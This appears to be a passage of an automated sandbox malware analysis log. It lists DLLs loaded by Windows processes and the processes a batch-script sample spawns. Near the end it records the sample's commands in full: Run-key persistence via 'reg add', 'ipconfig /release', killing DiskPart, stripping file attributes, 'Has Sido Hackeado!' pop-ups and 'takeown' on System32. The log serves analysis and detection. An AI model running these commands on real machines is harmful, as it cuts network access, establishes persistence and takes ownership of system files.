Source: C:\Windows\System32\wscript.exe |
Section loaded: wldp.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: msasn1.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: cryptsp.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: rsaenh.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: cryptbase.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: msisip.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: wshext.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: scrobj.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: textshaping.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: textinputframework.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: coreuicomponents.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: coremessaging.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: ntmarta.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: coremessaging.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: wintypes.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: wintypes.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: wintypes.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: windows.storage.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: version.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: kernel.appcore.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: uxtheme.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: sxs.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: vbscript.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: amsi.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: userenv.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: profapi.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: wldp.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: msasn1.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: cryptsp.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: rsaenh.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: cryptbase.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: msisip.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: wshext.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: scrobj.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: textshaping.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: textinputframework.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: coreuicomponents.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: coremessaging.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: ntmarta.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: coremessaging.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: wintypes.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: wintypes.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: wintypes.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: windows.storage.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: version.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: kernel.appcore.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: uxtheme.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: sxs.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: vbscript.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: amsi.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: userenv.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: profapi.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: wldp.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: msasn1.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: cryptsp.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: rsaenh.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: cryptbase.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: msisip.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: wshext.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: scrobj.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: textshaping.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: textinputframework.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: coreuicomponents.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: coremessaging.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: ntmarta.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: coremessaging.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: wintypes.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: wintypes.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: wintypes.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: windows.storage.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: version.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: kernel.appcore.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: uxtheme.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: sxs.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: vbscript.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: amsi.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: userenv.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: profapi.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: wldp.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: msasn1.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: cryptsp.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: rsaenh.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: cryptbase.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: msisip.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: wshext.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: scrobj.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: textshaping.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: textinputframework.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: coreuicomponents.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: coremessaging.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: ntmarta.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: coremessaging.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: wintypes.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: wintypes.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: wintypes.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: windows.storage.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: version.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: kernel.appcore.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: uxtheme.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: sxs.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: vbscript.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: amsi.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: userenv.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: profapi.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: wldp.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: msasn1.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: cryptsp.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: rsaenh.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: cryptbase.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: msisip.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: wshext.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: scrobj.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: textshaping.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: textinputframework.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: coreuicomponents.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: coremessaging.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: ntmarta.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: coremessaging.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: wintypes.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: wintypes.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: wintypes.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: windows.storage.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: version.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: kernel.appcore.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: uxtheme.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: sxs.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: vbscript.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: amsi.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: userenv.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: profapi.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: wldp.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: msasn1.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: cryptsp.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: rsaenh.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: cryptbase.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: msisip.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: wshext.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: scrobj.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: textshaping.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: textinputframework.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: coreuicomponents.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: coremessaging.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: ntmarta.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: wintypes.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: wintypes.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: wintypes.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: windows.storage.dll |
|
Source: C:\Windows\System32\msg.exe |
Section loaded: winsta.dll |
|
Source: C:\Windows\System32\msg.exe |
Section loaded: winsta.dll |
|
Source: C:\Windows\System32\msg.exe |
Section loaded: winsta.dll |
|
Source: C:\Users\user\Desktop\ADZP 20 Complex.exe |
Section loaded: winmm.dll |
|
Source: C:\Users\user\Desktop\ADZP 20 Complex.exe |
Section loaded: kernel.appcore.dll |
|
Source: C:\Users\user\Desktop\ADZP 20 Complex.exe |
Section loaded: uxtheme.dll |
|
Source: C:\Windows\System32\notepad.exe |
Section loaded: kernel.appcore.dll |
|
Source: C:\Windows\System32\notepad.exe |
Section loaded: uxtheme.dll |
|
Source: C:\Windows\System32\notepad.exe |
Section loaded: mrmcorer.dll |
|
Source: C:\Windows\System32\notepad.exe |
Section loaded: windows.storage.dll |
|
Source: C:\Windows\System32\notepad.exe |
Section loaded: wldp.dll |
|
Source: C:\Windows\System32\notepad.exe |
Section loaded: textshaping.dll |
|
Source: C:\Windows\System32\notepad.exe |
Section loaded: efswrt.dll |
|
Source: C:\Windows\System32\notepad.exe |
Section loaded: mpr.dll |
|
Source: C:\Windows\System32\notepad.exe |
Section loaded: wintypes.dll |
|
Source: C:\Windows\System32\notepad.exe |
Section loaded: twinapi.appcore.dll |
|
Source: C:\Windows\System32\notepad.exe |
Section loaded: oleacc.dll |
|
Source: C:\Windows\System32\notepad.exe |
Section loaded: textinputframework.dll |
|
Source: C:\Windows\System32\notepad.exe |
Section loaded: coreuicomponents.dll |
|
Source: C:\Windows\System32\notepad.exe |
Section loaded: coremessaging.dll |
|
Source: C:\Windows\System32\notepad.exe |
Section loaded: ntmarta.dll |
|
Source: C:\Windows\System32\notepad.exe |
Section loaded: coremessaging.dll |
|
Source: C:\Windows\System32\calc.exe |
Section loaded: windows.storage.dll |
|
Source: C:\Windows\System32\calc.exe |
Section loaded: wldp.dll |
|
Source: C:\Windows\System32\calc.exe |
Section loaded: kernel.appcore.dll |
|
Source: C:\Windows\System32\calc.exe |
Section loaded: uxtheme.dll |
|
Source: C:\Windows\System32\calc.exe |
Section loaded: propsys.dll |
|
Source: C:\Windows\System32\calc.exe |
Section loaded: urlmon.dll |
|
Source: C:\Windows\System32\calc.exe |
Section loaded: iertutil.dll |
|
Source: C:\Windows\System32\calc.exe |
Section loaded: srvcli.dll |
|
Source: C:\Windows\System32\calc.exe |
Section loaded: netutils.dll |
|
Source: C:\Windows\System32\calc.exe |
Section loaded: ieframe.dll |
|
Source: C:\Windows\System32\calc.exe |
Section loaded: netapi32.dll |
|
Source: C:\Windows\System32\calc.exe |
Section loaded: version.dll |
|
Source: C:\Windows\System32\calc.exe |
Section loaded: userenv.dll |
|
Source: C:\Windows\System32\calc.exe |
Section loaded: winhttp.dll |
|
Source: C:\Windows\System32\calc.exe |
Section loaded: wkscli.dll |
|
Source: C:\Windows\System32\calc.exe |
Section loaded: windows.staterepositoryps.dll |
|
Source: C:\Windows\System32\calc.exe |
Section loaded: edputil.dll |
|
Source: C:\Windows\System32\calc.exe |
Section loaded: secur32.dll |
|
Source: C:\Windows\System32\calc.exe |
Section loaded: sspicli.dll |
|
Source: C:\Windows\System32\calc.exe |
Section loaded: mlang.dll |
|
Source: C:\Windows\System32\calc.exe |
Section loaded: wininet.dll |
|
Source: C:\Windows\System32\calc.exe |
Section loaded: profapi.dll |
|
Source: C:\Windows\System32\calc.exe |
Section loaded: policymanager.dll |
|
Source: C:\Windows\System32\calc.exe |
Section loaded: msvcp110_win.dll |
|
Source: C:\Windows\System32\calc.exe |
Section loaded: twinui.appcore.dll |
|
Source: C:\Windows\System32\calc.exe |
Section loaded: onecoreuapcommonproxystub.dll |
|
Source: C:\Windows\System32\calc.exe |
Section loaded: wintypes.dll |
|
Source: C:\Windows\System32\calc.exe |
Section loaded: execmodelproxy.dll |
|
Source: C:\Windows\System32\calc.exe |
Section loaded: mrmcorer.dll |
|
Source: C:\Windows\System32\calc.exe |
Section loaded: windows.staterepositorycore.dll |
|
Source: C:\Windows\System32\calc.exe |
Section loaded: appxdeploymentclient.dll |
|
Source: C:\Windows\System32\calc.exe |
Section loaded: bcp47mrm.dll |
|
Source: C:\Windows\System32\calc.exe |
Section loaded: windows.ui.dll |
|
Source: C:\Windows\System32\calc.exe |
Section loaded: windowmanagementapi.dll |
|
Source: C:\Windows\System32\calc.exe |
Section loaded: textinputframework.dll |
|
Source: C:\Windows\System32\calc.exe |
Section loaded: inputhost.dll |
|
Source: C:\Windows\System32\calc.exe |
Section loaded: twinapi.appcore.dll |
|
Source: C:\Windows\System32\calc.exe |
Section loaded: coremessaging.dll |
|
Source: C:\Windows\System32\calc.exe |
Section loaded: twinapi.appcore.dll |
|
Source: C:\Windows\System32\calc.exe |
Section loaded: coreuicomponents.dll |
|
Source: C:\Windows\System32\calc.exe |
Section loaded: coremessaging.dll |
|
Source: C:\Windows\System32\calc.exe |
Section loaded: coremessaging.dll |
|
Source: C:\Windows\System32\calc.exe |
Section loaded: coreuicomponents.dll |
|
Source: C:\Windows\System32\calc.exe |
Section loaded: ntmarta.dll |
|
Source: C:\Windows\explorer.exe |
Section loaded: aepic.dll |
|
Source: C:\Windows\explorer.exe |
Section loaded: twinapi.dll |
|
Source: C:\Windows\explorer.exe |
Section loaded: userenv.dll |
|
Source: C:\Windows\explorer.exe |
Section loaded: iphlpapi.dll |
|
Source: C:\Windows\explorer.exe |
Section loaded: powrprof.dll |
|
Source: C:\Windows\explorer.exe |
Section loaded: windows.storage.dll |
|
Source: C:\Windows\explorer.exe |
Section loaded: dxgi.dll |
|
Source: C:\Windows\explorer.exe |
Section loaded: windows.storage.dll |
|
Source: C:\Windows\explorer.exe |
Section loaded: kernel.appcore.dll |
|
Source: C:\Windows\explorer.exe |
Section loaded: propsys.dll |
|
Source: C:\Windows\explorer.exe |
Section loaded: coremessaging.dll |
|
Source: C:\Windows\explorer.exe |
Section loaded: urlmon.dll |
|
Source: C:\Windows\explorer.exe |
Section loaded: windows.storage.dll |
|
Source: C:\Windows\explorer.exe |
Section loaded: windows.storage.dll |
|
Source: C:\Windows\explorer.exe |
Section loaded: kernel.appcore.dll |
|
Source: C:\Windows\explorer.exe |
Section loaded: wtsapi32.dll |
|
Source: C:\Windows\explorer.exe |
Section loaded: wininet.dll |
|
Source: C:\Windows\explorer.exe |
Section loaded: uxtheme.dll |
|
Source: C:\Windows\explorer.exe |
Section loaded: dwmapi.dll |
|
Source: C:\Windows\explorer.exe |
Section loaded: sspicli.dll |
|
Source: C:\Windows\explorer.exe |
Section loaded: kernel.appcore.dll |
|
Source: C:\Windows\explorer.exe |
Section loaded: twinapi.appcore.dll |
|
Source: C:\Windows\explorer.exe |
Section loaded: ntmarta.dll |
|
Source: C:\Windows\explorer.exe |
Section loaded: cryptsp.dll |
|
Source: C:\Windows\explorer.exe |
Section loaded: wldp.dll |
|
Source: C:\Windows\explorer.exe |
Section loaded: iertutil.dll |
|
Source: C:\Windows\explorer.exe |
Section loaded: srvcli.dll |
|
Source: C:\Windows\explorer.exe |
Section loaded: netutils.dll |
|
Source: C:\Windows\explorer.exe |
Section loaded: umpdc.dll |
|
Source: C:\Windows\explorer.exe |
Section loaded: profapi.dll |
|
Source: C:\Windows\explorer.exe |
Section loaded: edputil.dll |
|
Source: C:\Windows\explorer.exe |
Section loaded: apphelp.dll |
|
Source: C:\Windows\explorer.exe |
Section loaded: appresolver.dll |
|
Source: C:\Windows\explorer.exe |
Section loaded: bcp47langs.dll |
|
Source: C:\Windows\explorer.exe |
Section loaded: slc.dll |
|
Source: C:\Windows\explorer.exe |
Section loaded: sppc.dll |
|
Source: C:\Windows\explorer.exe |
Section loaded: starttiledata.dll |
|
Source: C:\Windows\explorer.exe |
Section loaded: usermgrcli.dll |
|
Source: C:\Windows\explorer.exe |
Section loaded: usermgrproxy.dll |
|
Source: C:\Windows\explorer.exe |
Section loaded: cscui.dll |
|
Source: C:\Windows\explorer.exe |
Section loaded: structuredquery.dll |
|
Source: C:\Windows\explorer.exe |
Section loaded: windows.globalization.dll |
|
Source: C:\Windows\explorer.exe |
Section loaded: bcp47mrm.dll |
|
Source: C:\Windows\explorer.exe |
Section loaded: icu.dll |
|
Source: C:\Windows\explorer.exe |
Section loaded: mswb7.dll |
|
Source: C:\Windows\explorer.exe |
Section loaded: windows.storage.search.dll |
|
Source: C:\Windows\explorer.exe |
Section loaded: explorerframe.dll |
|
Source: C:\Windows\explorer.exe |
Section loaded: actxprxy.dll |
|
Source: C:\Windows\explorer.exe |
Section loaded: wintypes.dll |
|
Source: C:\Windows\explorer.exe |
Section loaded: windows.staterepositoryps.dll |
|
Source: C:\Windows\System32\mspaint.exe |
Section loaded: apphelp.dll |
|
Source: C:\Windows\System32\mspaint.exe |
Section loaded: acgenral.dll |
|
Source: C:\Windows\System32\mspaint.exe |
Section loaded: userenv.dll |
|
Source: C:\Windows\System32\mspaint.exe |
Section loaded: mpr.dll |
|
Source: C:\Windows\System32\mspaint.exe |
Section loaded: sspicli.dll |
|
Source: C:\Windows\System32\mspaint.exe |
Section loaded: mfc42u.dll |
|
Source: C:\Windows\System32\mspaint.exe |
Section loaded: propsys.dll |
|
Source: C:\Windows\System32\mspaint.exe |
Section loaded: winmm.dll |
|
Source: C:\Windows\System32\mspaint.exe |
Section loaded: ninput.dll |
|
Source: C:\Windows\System32\mspaint.exe |
Section loaded: uxtheme.dll |
|
Source: C:\Windows\System32\mspaint.exe |
Section loaded: msftedit.dll |
|
Source: C:\Windows\System32\mspaint.exe |
Section loaded: kernel.appcore.dll |
|
Source: C:\Windows\System32\mspaint.exe |
Section loaded: uiribbon.dll |
|
Source: C:\Windows\System32\mspaint.exe |
Section loaded: xmllite.dll |
|
Source: C:\Windows\System32\mspaint.exe |
Section loaded: windows.storage.dll |
|
Source: C:\Windows\System32\mspaint.exe |
Section loaded: wldp.dll |
|
Source: C:\Windows\System32\mspaint.exe |
Section loaded: efswrt.dll |
|
Source: C:\Windows\System32\mspaint.exe |
Section loaded: wintypes.dll |
|
Source: C:\Windows\System32\mspaint.exe |
Section loaded: twinapi.appcore.dll |
|
Source: C:\Windows\System32\mspaint.exe |
Section loaded: sti.dll |
|
Source: C:\Windows\System32\mspaint.exe |
Section loaded: wiatrace.dll |
|
Source: C:\Windows\System32\mspaint.exe |
Section loaded: atlthunk.dll |
|
Source: C:\Windows\System32\mspaint.exe |
Section loaded: dwmapi.dll |
|
Source: C:\Windows\System32\mspaint.exe |
Section loaded: windowscodecs.dll |
|
Source: C:\Windows\System32\mspaint.exe |
Section loaded: textshaping.dll |
|
Source: C:\Windows\System32\mspaint.exe |
Section loaded: oleacc.dll |
|
Source: C:\Windows\System32\mspaint.exe |
Section loaded: textinputframework.dll |
|
Source: C:\Windows\System32\mspaint.exe |
Section loaded: coreuicomponents.dll |
|
Source: C:\Windows\System32\mspaint.exe |
Section loaded: coremessaging.dll |
|
Source: C:\Windows\System32\mspaint.exe |
Section loaded: ntmarta.dll |
|
Source: C:\Windows\System32\cmd.exe |
Section loaded: cmdext.dll |
|
Source: C:\Windows\System32\cmd.exe |
Section loaded: ntmarta.dll |
|
Source: C:\Windows\System32\cmd.exe |
Section loaded: kernel.appcore.dll |
|
Source: C:\Windows\System32\cmd.exe |
Section loaded: uxtheme.dll |
|
Source: C:\Windows\System32\cmd.exe |
Section loaded: windows.storage.dll |
|
Source: C:\Windows\System32\cmd.exe |
Section loaded: wldp.dll |
|
Source: C:\Windows\System32\cmd.exe |
Section loaded: propsys.dll |
|
Source: C:\Windows\System32\cmd.exe |
Section loaded: edputil.dll |
|
Source: C:\Windows\System32\cmd.exe |
Section loaded: urlmon.dll |
|
Source: C:\Windows\System32\cmd.exe |
Section loaded: iertutil.dll |
|
Source: C:\Windows\System32\cmd.exe |
Section loaded: srvcli.dll |
|
Source: C:\Windows\System32\cmd.exe |
Section loaded: netutils.dll |
|
Source: C:\Windows\System32\cmd.exe |
Section loaded: windows.staterepositoryps.dll |
|
Source: C:\Windows\System32\cmd.exe |
Section loaded: policymanager.dll |
|
Source: C:\Windows\System32\cmd.exe |
Section loaded: msvcp110_win.dll |
|
Source: C:\Windows\System32\cmd.exe |
Section loaded: sspicli.dll |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K Twain_20.cmd |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K Twain_20.cmd |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\Desktop\Informacion.vbs" |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K Taskdl.bat |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\reg.exe reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\reg.exe reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\ipconfig.exe ipconfig /release |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\taskkill.exe taskkill /im DiskPart /f |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\attrib.exe attrib -r -a -s -h *.* |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\Desktop\ErrorCritico.vbs" |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\Desktop\Advertencia.vbs" |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\Desktop\ErrorCritico.vbs" |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\Desktop\Advertencia.vbs" |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\Desktop\ErrorCritico.vbs" |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\Desktop\Advertencia.vbs" |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\taskkill.exe taskkill /im DiskPart /f |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\Desktop\Advertencia.vbs" |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\Desktop\ErrorCritico.vbs" |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\Desktop\Advertencia.vbs" |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\msg.exe msg * Virus Detectado |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\msg.exe msg * Virus Detectado |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\msg.exe msg * Has Sido Hackeado! |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Users\user\Desktop\ADZP 20 Complex.exe "C:\Users\user\Desktop\ADZP 20 Complex.exe" |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\notepad.exe notepad |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\calc.exe calc |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\explorer.exe explorer.exe |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\mspaint.exe mspaint.exe |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Users\user\Desktop\ADZP 20 Complex.exe "C:\Users\user\Desktop\ADZP 20 Complex.exe" |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\notepad.exe notepad |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\calc.exe calc |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\explorer.exe explorer.exe |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\mspaint.exe mspaint.exe |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Users\user\Desktop\ADZP 20 Complex.exe "C:\Users\user\Desktop\ADZP 20 Complex.exe" |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\notepad.exe notepad |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\calc.exe calc |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\explorer.exe explorer.exe |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\takeown.exe takeown /f "C:\Windows\System32" /r |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
|
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
|
Source: C:\Windows\System32\cmd.exe |
Process created: unknown unknown |
|
